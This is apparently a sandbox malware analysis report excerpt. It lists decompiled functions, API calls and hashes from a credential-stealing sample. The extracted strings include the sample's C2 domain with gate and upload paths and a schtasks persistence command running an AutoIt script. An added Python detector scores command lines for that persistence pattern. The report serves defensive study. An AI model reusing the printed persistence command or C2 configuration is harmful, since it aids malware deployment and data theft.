          • Instruction Fuzzy Hash: 1351C5719001689ACB649B58CC417FB73E9FF48300F04C1BBE989A62C1EE399E85CB90
          APIs
          • GetLocaleInfoW.KERNELBASE(?,00000002,?,00000100), ref: 0005D60E
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: InfoLocale
          • String ID: |
          • API String ID: 2299586839-2145946048
          • Opcode ID: c600c69035f0e199130d100ab24c6a923ed3527517112811048da90fb8d9bf6f
          • Instruction ID: ba5f65cec9dd7af5dfd6ece72c174112d3e34f7b9156ef3aa7b2d2ef192369d4
          • Opcode Fuzzy Hash: c600c69035f0e199130d100ab24c6a923ed3527517112811048da90fb8d9bf6f
          • Instruction Fuzzy Hash: B741A331A401198BDB71DF58C841BEBF3F5EB48701F1541ABD809D7280EB749E86CB90
          APIs
          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?,7D5DF9B0), ref: 0005A74B
            • Part of subcall function 00054790: malloc.MSVCRT(0006AF98,7D5DF9B0,?,?), ref: 000547D6
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: CryptDataUnprotectmalloc
          • String ID:
          • API String ID: 70552612-0
          • Opcode ID: 047db30e76085f21f425933cd8f8bb6ad2e5371cf3b5142d04442cf227593c46
          • Instruction ID: ab154918b5b672f7bd25c34d17d9b3f6892c408810b6aab32fe6364e46f58b50
          • Opcode Fuzzy Hash: 047db30e76085f21f425933cd8f8bb6ad2e5371cf3b5142d04442cf227593c46
          • Instruction Fuzzy Hash: C1218E75A0820A9FDB14CF98C841BAFFBF9EF49710F10426DE914AB380DB75A9048B91
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: LibraryLoad
          • String ID:
          • API String ID: 1029625771-0
          • Opcode ID: 4bb5743f56291807b706f2734c6577e27766bb71b43da57ad37da98063944a4a
          • Instruction ID: 7d313116a1129664bb56e07ded700b0c2894387d399a0b00bf5077c81095b617
          • Opcode Fuzzy Hash: 4bb5743f56291807b706f2734c6577e27766bb71b43da57ad37da98063944a4a
          • Instruction Fuzzy Hash: 9211E9F1FC036257DB74AF15DC8056F33A7ABA1382710912AFA1A9B151EB3199058B25
          APIs
          • FindFirstFileW.KERNELBASE(00000000,00000001,7D5DF9B0,00000000,00000000,00000001), ref: 0005EF51
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: FileFindFirst
          • String ID:
          • API String ID: 1974802433-0
          • Opcode ID: 821cc1f9d9dac1922d861b16391fffa7a5e2ca96c2d22dc7f789f6fe145ceb13
          • Instruction ID: 994936de7b63b805d4aa93ab046faf19f0046089018ebebe212d85e37ad795e4
          • Opcode Fuzzy Hash: 821cc1f9d9dac1922d861b16391fffa7a5e2ca96c2d22dc7f789f6fe145ceb13
          • Instruction Fuzzy Hash: 8901B171A091549FE714EBA8C801BAFB3A9EB48720F10437AE915E73C0DA396E0487A1
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: fdc2bbb461ac1c3a91730fe0724103491e1ace4a63c365c429ef8ce87993dc62
          • Instruction ID: d341066167898de131a1fe65e3f1ee9abaf4c9eb316ec4782f5f9853a0621c52
          • Opcode Fuzzy Hash: fdc2bbb461ac1c3a91730fe0724103491e1ace4a63c365c429ef8ce87993dc62
          • Instruction Fuzzy Hash: 69029E70600B008BDB68DF29C4917ABB7F2FF84315F10466DE9968B786DB74E949CB90
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: b6b88cacc741c7ab8afb9880c199e93aeda8dfe811ec623b8a36b44c48a1d797
          • Instruction ID: afa80f7b1019db4bd924fd96576a312dfc866e563c1ef7bc77014a762bd3cd1b
          • Opcode Fuzzy Hash: b6b88cacc741c7ab8afb9880c199e93aeda8dfe811ec623b8a36b44c48a1d797
          • Instruction Fuzzy Hash: 1EE08C32911268EBCB15DBC8C904D8AF3EDEB44B40B1140A6B501D3202CA72DE00D7D0

          Control-flow Graph (legend: executed / not executed)
          • Function at 5d720, basic blocks 5d720-5dabe: RegOpenKeyExW on an HKEY_CURRENT_USER key (80000001), then a RegEnumKeyExW loop that opens each subkey with RegOpenKeyExW, queries its DisplayName and DisplayVersion values with RegQueryValueExW and closes the handles with RegCloseKey, i.e. an installed-software listing; the rendered node and edge list is omitted.
          APIs
          • RegOpenKeyExW.KERNELBASE(80000001,0005E472,00000000,00020119,?,7D5DF9B0,00000000,00000000,00000000), ref: 0005D788
          • RegEnumKeyExW.KERNELBASE(?,00000000,?,00000100,00000000,00000000,00000000,00000000), ref: 0005D7BC
          • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 0005D827
          • RegQueryValueExW.KERNELBASE(?,DisplayName,00000000,00000200,?,00000200), ref: 0005D868
          • RegQueryValueExW.KERNELBASE(?,DisplayVersion,00000000,?,?,00000200), ref: 0005D94C
          • RegCloseKey.KERNELBASE(?), ref: 0005DAA0
          • RegCloseKey.KERNELBASE(?), ref: 0005DAB7
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: CloseOpenQueryValue$Enum
          • String ID: (Version: $)$DisplayName$DisplayVersion
          • API String ID: 1752312236-2099137428
          • Opcode ID: a43d7158014b8a64debae4a725289ae1c2524d28e856a82bc78f7d4b2570f122
          • Instruction ID: f1020c401a7514af38de0c6bb0b71d60d6098e30a06699a331372ee90ae8d362
          • Opcode Fuzzy Hash: a43d7158014b8a64debae4a725289ae1c2524d28e856a82bc78f7d4b2570f122
          • Instruction Fuzzy Hash: 91A114709402169ADB74DB64CC51BBBB3B6EF44300F0082DAEA096B2C0EF759E89CB55

          Strings
          • LocalAppData, xrefs: 000545DB
          • \Desktop\Invoice.docx, xrefs: 00054635, 0005464A
          • oSab, xrefs: 00054490
          • tztwo2ht.top\PoconusurioSabnN\ServiceData\ServiceData\Clip.au3\ServiceData\Clip.exe/c schtasks /create /tn \Service\Data /tr """"%wS""" """%wS"""" /st 00:01 /du 9800:59 /sc once /ri 1 /fGETPOST/index.php/gate.php/zip.php/upload.phpcur, xrefs: 00054487
          • nN, xrefs: 00054498
          • \Poconusuri, xrefs: 0005460D, 0005461F
          • UserProfile, xrefs: 000545EB
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID:
          • String ID: LocalAppData$UserProfile$\Desktop\Invoice.docx$\Poconusuri$nN$oSab$tztwo2ht.top\PoconusurioSabnN\ServiceData\ServiceData\Clip.au3\ServiceData\Clip.exe/c schtasks /create /tn \Service\Data /tr """"%wS""" """%wS"""" /st 00:01 /du 9800:59 /sc once /ri 1 /fGETPOST/index.php/gate.php/zip.php/upload.phpcur
          • API String ID: 0-2699568637
          • Opcode ID: e5677d8e51bfe5fd58d660765a3dd737e04a3c2d08f6ffaca903c820316f369a
          • Instruction ID: 3b1b7723263df8cedd3a42f5a6b297898280ec91679c24be1b90a45d07d51def
          • Opcode Fuzzy Hash: e5677d8e51bfe5fd58d660765a3dd737e04a3c2d08f6ffaca903c820316f369a
          • Instruction Fuzzy Hash: 0241E23060461246EB04BF60C8667FFB2A3DF81345F448978F9459F2C3EF289A898396
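The configuration string in this function carries the persistence command the sample hands to cmd.exe: `schtasks /create /tn \Service\Data /tr """"%wS""" """%wS"""" /st 00:01 /du 9800:59 /sc once /ri 1 /f`, where the two `%wS` values are the `Clip.exe` interpreter and the `Clip.au3` script under `\PoconusurioSabnN\ServiceData\` in the user's profile. A `/sc once` task would normally fire a single time; combining it with a 9800-hour duration and a one-minute repeat interval makes it recur every minute for over a year without using the `minute`, `hourly` or `daily` schedule types. The Python below is an added example for this report, not code from the report or from the sample: it scores process-creation command lines for that shape. The log lines are constructed, and the `C:\Users\victim\...` path in them is invented.

```python
r"""Score schtasks /create command lines for the persistence shape in the
sample's configuration string: /sc once made to recur through a 9800-hour
/du and a one-minute /ri, task name \Service\Data, /f, and an AutoIt
interpreter (Clip.exe) run against a script (Clip.au3) from a user-writable
directory.

Added example for this report; not code from the report or from the sample.
The process-creation log lines are constructed and the victim path is invented."""
import re
from typing import Dict, List, Optional

_SCHTASKS_CREATE = re.compile(r"\bschtasks(?:\.exe)?\s+/create\b", re.I)
# A switch value runs until the next schtasks switch or the end of the line.
_NEXT_SWITCH = r"(?=\s+/(?:tn|tr|sc|st|sd|ed|du|ri|f|rl|ru|rp|mo|k|z|v1|np)\b|$)"


def _switch(cmdline: str, name: str) -> Optional[str]:
    """Raw value following /<name>, or None when the switch is absent."""
    m = re.search(r"/" + name + r"\s+(.+?)" + _NEXT_SWITCH, cmdline, re.I)
    return m.group(1) if m else None


def duration_hours(du: Optional[str]) -> int:
    """/du is HHHH:MM; return the hour component, 0 when absent or malformed."""
    m = re.fullmatch(r"(\d+):(\d{2})", (du or "").strip())
    return int(m.group(1)) if m else 0


def analyze_schtasks(cmdline: str) -> Optional[Dict[str, object]]:
    """Indicator flags and a score for a schtasks /create line; None for anything else."""
    if not _SCHTASKS_CREATE.search(cmdline):
        return None
    sc = (_switch(cmdline, "sc") or "").lower()
    ri = _switch(cmdline, "ri")
    du_h = duration_hours(_switch(cmdline, "du"))
    tn = (_switch(cmdline, "tn") or "").strip('"')
    tr = (_switch(cmdline, "tr") or "").lower()
    flags = {
        # "once" + repeat interval + multi-day duration: a recurring task that
        # avoids the /sc minute|hourly|daily schedule types.
        "once_made_persistent": sc == "once" and ri is not None and du_h >= 24,
        "task_name_service_data": tn.lower().startswith("\\service\\data"),
        "forced_overwrite": re.search(r"\s/f\b", cmdline, re.I) is not None,
        "autoit_script_launch": ".exe" in tr and ".au3" in tr,
        "user_writable_path": "\\appdata\\local\\" in tr or "%localappdata%" in tr,
    }
    score = sum(flags.values())
    return {"flags": flags, "score": score, "task_name": tn,
            "suspicious": flags["once_made_persistent"] or score >= 3}


def scan(process_log: List[str]) -> List[Dict[str, object]]:
    """Run analyze_schtasks over command lines (one per process-creation event)."""
    hits = []
    for idx, cmdline in enumerate(process_log):
        result = analyze_schtasks(cmdline)
        if result and result["suspicious"]:
            hits.append({"line": idx, **result})
    return hits


# Constructed log. Line 0 follows the sample's format string with an invented
# victim path; lines 1 and 2 are benign controls.
CONSTRUCTED_PROCESS_LOG = [
    (r'cmd.exe /c schtasks /create /tn \Service\Data '
     r'/tr """"C:\Users\victim\AppData\Local\PoconusurioSabnN\ServiceData\Clip.exe""" '
     r'"""C:\Users\victim\AppData\Local\PoconusurioSabnN\ServiceData\Clip.au3"""" '
     r'/st 00:01 /du 9800:59 /sc once /ri 1 /f'),
    (r'schtasks.exe /create /tn "\Microsoft\Windows\Vendor\Update" '
     r'/tr "C:\Program Files\Vendor\updater.exe" /sc daily /st 03:00'),
    r'"C:\Windows\System32\svchost.exe" -k netsvcs -p',
]

if __name__ == "__main__":
    for hit in scan(CONSTRUCTED_PROCESS_LOG):
        print(hit["line"], hit["task_name"], hit["score"], hit["flags"])
```

The `once_made_persistent` flag is deliberately sufficient on its own, because the `/sc once` + `/du` + `/ri` combination is rarely used by legitimate installers, while the path and task-name flags are specific to this sample's configuration and will need updating when the operator changes the folder or task name.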

          Control-flow Graph (legend: executed / not executed)
          • Function at 6ffda4, basic blocks 6ffda4-700148: CRT-style narrow-to-wide string conversion, calling MultiByteToWideChar repeatedly around _malloc, _memset and __freea (see the APIs list below); the rendered node and edge list is omitted.
          APIs
          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,00000100,?,?,?,?,?,?,?,?), ref: 006FFE74
          • _malloc.LIBCMT ref: 006FFEAD
          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,?,00000000,?,?,?,?,?), ref: 006FFEE0
          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?,?), ref: 006FFEFC
          • MultiByteToWideChar.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 006FFF36
          • _malloc.LIBCMT ref: 006FFF6F
          • __freea.LIBCMT ref: 006FFFC7
          • __freea.LIBCMT ref: 006FFFD0
          • _malloc.LIBCMT ref: 00700085
          • _memset.LIBCMT ref: 007000A7
          • __freea.LIBCMT ref: 007000F2
          Memory Dump Source
          • Source File: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: ByteCharMultiWide$__freea_malloc$_memset
          • String ID:
          • API String ID: 3920393152-0
          • Opcode ID: 529bc0e6fbc024704249341d0bee3891ba6fea4daa854f5e949187950261ef3a
          • Instruction ID: 2f365da9317c935d4877c4087ba904b748de7f0d21d36f2572c7e2cc601398de
          • Opcode Fuzzy Hash: 529bc0e6fbc024704249341d0bee3891ba6fea4daa854f5e949187950261ef3a
          • Instruction Fuzzy Hash: E6B1AD7280015EEFCF219FA4CC859FE7BA6EF09314F144239FA15A62A1D7398D61DB90

          Control-flow Graph
          APIs
          • CreateDirectoryW.KERNELBASE(00000000,00000000,00001770), ref: 0005468D
          • Sleep.KERNELBASE(0000015E), ref: 000546A8
          • Sleep.KERNELBASE(0000028A), ref: 000546C8
          • Sleep.KERNELBASE(000002BC), ref: 000546E3
          • Sleep.KERNELBASE(0000028A), ref: 000546FE
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: Sleep$CreateDirectory
          • String ID: LocalAppData$UserProfile$\Desktop\Invoice.docx$\Poconusuri
          • API String ID: 2746843503-705830698
          • Opcode ID: bee2af8e8a35d8c2932d74ef57497daff568d9bb8549839dd3117635ad471429
          • Instruction ID: 12a337fcde7c8327486a3bb0a41e488973547873af1c5b865c0ae21d42b78ab3
          • Opcode Fuzzy Hash: bee2af8e8a35d8c2932d74ef57497daff568d9bb8549839dd3117635ad471429
          • Instruction Fuzzy Hash: 3D41DB34A0061247DF696B60C8163FF6293EF8130AF159579ED468B3D7FE38898A8356

          Control-flow Graph
          APIs
          • CreateDirectoryW.KERNELBASE(00000000,00000000,00001770), ref: 0005468D
          • Sleep.KERNELBASE(0000015E), ref: 000546A8
          • Sleep.KERNELBASE(0000028A), ref: 000546C8
          • Sleep.KERNELBASE(000002BC), ref: 000546E3
          • Sleep.KERNELBASE(0000028A), ref: 000546FE
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: Sleep$CreateDirectory
          • String ID: LocalAppData$UserProfile$\Desktop\Invoice.docx$\Poconusuri
          • API String ID: 2746843503-705830698
          • Opcode ID: 0db0324cb13588c927c3387b6bcf8cb098c7b9780f37268a66f0f08ed5478ab3
          • Instruction ID: bd3f3f0d5cc82a93595e41d85518d24e822d5d567fc44ff6adfc554d66f98b56
          • Opcode Fuzzy Hash: 0db0324cb13588c927c3387b6bcf8cb098c7b9780f37268a66f0f08ed5478ab3
          • Instruction Fuzzy Hash: F941EA30A0061247DF686B60C8563FF6293EF8130AF159578ED428B3D7EF38898A8352

          Control-flow Graph
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID:
          • String ID: LocalAppData$UserProfile$\Desktop\Invoice.docx$\Poconusuri
          • API String ID: 0-705830698
          • Opcode ID: 95acf727781b2baca1250bbdc0770207f32445df375aac9ca376ef95059c55fd
          • Instruction ID: 0ccf9a9ec9cb521b53d89bf45b43780db33297594b151a5a93c2f8e46c048ef1
          • Opcode Fuzzy Hash: 95acf727781b2baca1250bbdc0770207f32445df375aac9ca376ef95059c55fd
          • Instruction Fuzzy Hash: 1441A434A0161246EF692B60C4263FF62A3EF8130AF159579EE414F2C7EE388DC98352

          Control-flow Graph
          APIs
          • CreateDirectoryW.KERNELBASE(00000000,00000000,00001770), ref: 0005468D
          • Sleep.KERNELBASE(0000015E), ref: 000546A8
          • Sleep.KERNELBASE(0000028A), ref: 000546C8
          • Sleep.KERNELBASE(000002BC), ref: 000546E3
          • Sleep.KERNELBASE(0000028A), ref: 000546FE
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: Sleep$CreateDirectory
          • String ID: LocalAppData$UserProfile$\Desktop\Invoice.docx$\Poconusuri
          • API String ID: 2746843503-705830698
          • Opcode ID: 656e8fae4260d24d6d784f61f03aa9f907377b7c9a32a1c65937efcc8cc4f53f
          • Instruction ID: 8ad1c3b01dce8749ce832423d5392875bb1b75fa451e82c312bdd818018c4d0b
          • Opcode Fuzzy Hash: 656e8fae4260d24d6d784f61f03aa9f907377b7c9a32a1c65937efcc8cc4f53f
          • Instruction Fuzzy Hash: A931853460161257DF693BA4D8263FF62A3DF81306F148578FA418F7D7EE388A8A4356

          Control-flow Graph
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: String___crt$_memset
          • String ID:
          • API String ID: 3770204449-3916222277
          • Opcode ID: 874c729ea067fc72b0ba3f98a6d3128bb8c931658f4a93bf95fd253cea380beb
          • Instruction ID: 1cc587a1cb20d6c18bd9a60de47e78e3878923b88fce73ded587ef106329dd10
          • Opcode Fuzzy Hash: 874c729ea067fc72b0ba3f98a6d3128bb8c931658f4a93bf95fd253cea380beb
          • Instruction Fuzzy Hash: E541077150475C9EDB218B248C89BFB7FEAAB45308F1444ECE68687193E2769A458F50

          Control-flow Graph

          APIs
          • ___scrt_release_startup_lock.LIBCMT ref: 00060822
          • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 00060836
          • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 0006085C
          • ___scrt_uninitialize_crt.LIBCMT ref: 0006089F
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: ___scrt_is_nonwritable_in_current_image$___scrt_release_startup_lock___scrt_uninitialize_crt
          • String ID:
          • API String ID: 3089971210-0
          • Opcode ID: 6ae1d31d71caabf617f09caeb9a60af7ded6262a219c95a9b0b0034e0b36c09b
          • Instruction ID: 1c9722a2001fea837fe499f92ef93990a7466bbb46a1e546d83cc270310cbcfc
          • Opcode Fuzzy Hash: 6ae1d31d71caabf617f09caeb9a60af7ded6262a219c95a9b0b0034e0b36c09b
          • Instruction Fuzzy Hash: C12108326C43116ADA31BB649C07ADF67E3DF42764F20012AF5812B1D3DF66494196E5

          Control-flow Graph
          APIs
            • Part of subcall function 00054790: malloc.MSVCRT(0006AF98,7D5DF9B0,?,?), ref: 000547D6
          • RegOpenKeyExW.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,0006BF40,7D5DF9B0,00000000,00000000), ref: 0005DB4F
          • RegQueryValueExW.KERNELBASE(0006BF40,0005E402,00000000,00000000,00000000,00000400), ref: 0005DB71
          Strings
          • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 0005DB49
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: OpenQueryValuemalloc
          • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0
          • API String ID: 147835836-1200804856
          • Opcode ID: 8f146ee03062c1df6da1613ad255892123dabbe68702137413276781ec9defe4
          • Instruction ID: dbbfe605d9876d6024a88ddd8cfe03fef7ebb9a1dca53e87e7ad00e5f207957b
          • Opcode Fuzzy Hash: 8f146ee03062c1df6da1613ad255892123dabbe68702137413276781ec9defe4
          • Instruction Fuzzy Hash: B921F671A44115AFEB14DB98DC02BBFB7A9EF84715F10417AFA14A73C1DB355E008790

          Control-flow Graph

          control_flow_graph 1386 5dfe0-5e049 call 61910 call 60380 GlobalMemoryStatusEx 1391 5e0d1 1386->1391 1392 5e04f-5e079 call 6bad0 call 54790 1386->1392 1393 5e0d3-5e0ee call 6048f 1391->1393 1399 5e07e-5e082 1392->1399 1399->1391 1400 5e084-5e0bd call 60380 1399->1400 1400->1393
          APIs
          • GlobalMemoryStatusEx.KERNELBASE(00000040,00000000,00000000,00000001), ref: 0005E045
            • Part of subcall function 00054790: malloc.MSVCRT(0006AF98,7D5DF9B0,?,?), ref: 000547D6
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: GlobalMemoryStatusmalloc
          • String ID: %.2f MB (%.2f GB)$@
          • API String ID: 207635350-642326303
          • Opcode ID: a318dd3f03ca78c9ad0eae6b2c2201d338859e37aaa9770cbd1443c787e0bc99
          • Instruction ID: e54ac3852be45dab6fa8472985b23c16b1eb83c40a090cc903d052a56c3abf9e
          • Opcode Fuzzy Hash: a318dd3f03ca78c9ad0eae6b2c2201d338859e37aaa9770cbd1443c787e0bc99
          • Instruction Fuzzy Hash: 3021AE71E40B5C9BD711EFA4CC11BAFB7B9EF49750F008229E909AB281DF7899808790

          Control-flow Graph

          control_flow_graph 1404 5a510-5a574 call 60380 CreateFileW 1407 5a62a-5a641 call 60380 1404->1407 1408 5a57a-5a5d1 call 60380 call 5a040 call 60380 * 2 1404->1408 1415 5a674 1407->1415 1416 5a643-5a653 call 54790 1407->1416 1408->1407 1439 5a5d3-5a628 call 60380 call 59db0 call 60380 * 2 1408->1439 1418 5a679-5a683 call 60380 1415->1418 1416->1418 1426 5a655-5a66b call 60380 ReadFile 1416->1426 1430 5a686-5a699 1418->1430 1431 5a66d-5a66f call 54840 1426->1431 1432 5a69a-5a6c8 call 60380 FindCloseChangeNotification 1426->1432 1431->1415 1439->1407 1439->1430
          APIs
          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,7D5DF9B0,00000000,?), ref: 0005A56D
          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 0005A667
          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0005A6B0
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: File$ChangeCloseCreateFindNotificationRead
          • String ID:
          • API String ID: 2525391649-0
          • Opcode ID: dc77303a6ef89cf07e3181c29ba63e41d403ff85d992cf88cde4a9cb5e48892a
          • Instruction ID: 5c9fba7ac555c56ad402cc4d0459982546167f79a197cbf482721f31fa8d27c7
          • Opcode Fuzzy Hash: dc77303a6ef89cf07e3181c29ba63e41d403ff85d992cf88cde4a9cb5e48892a
          • Instruction Fuzzy Hash: 624124307812106BE354E768CC52FAFB39ADB85710F208368FA54AB3C2DE782F058355

          Control-flow Graph

          control_flow_graph 1451 5a3e0-5a444 call 60380 CreateFileW 1454 5a446-5a45d call 60380 1451->1454 1455 5a47c-5a48f 1451->1455 1459 5a4b1-5a4b9 1454->1459 1460 5a45f-5a46f call 54790 1454->1460 1461 5a474-5a479 call 60380 1459->1461 1465 5a471 1460->1465 1466 5a490-5a4a8 call 60380 ReadFile 1460->1466 1461->1455 1465->1461 1470 5a4bb-5a4e9 call 60380 FindCloseChangeNotification 1466->1470 1471 5a4aa-5a4ac call 54840 1466->1471 1471->1459
          APIs
          • CreateFileW.KERNELBASE(003A60A5,80000000,00000007,00000000,00000003,00000080,00000000,7D5DF9B0,00000001,?), ref: 0005A43D
          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 0005A4A4
          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0005A4D1
            • Part of subcall function 00054790: malloc.MSVCRT(0006AF98,7D5DF9B0,?,?), ref: 000547D6
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmp
